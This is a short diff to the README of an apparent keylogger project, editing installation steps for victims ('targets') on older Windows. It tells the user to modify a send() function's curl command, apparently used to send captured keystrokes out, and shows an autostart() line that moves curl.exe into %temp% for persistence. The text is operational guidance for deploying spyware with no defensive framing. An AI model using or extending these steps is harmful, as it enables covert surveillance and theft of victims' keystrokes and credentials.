vende11s/keylogg/README.md

 * Enjoy

 ## Instalation if ur target use windows older than 1706
-* Add in the function send() in string "cmd" add .exe after curl
+* Add in the function send() in string "cmd" .exe after "curl"
 * Add in the function autostart()
 ```
 file << "move curl.exe %temp%\n";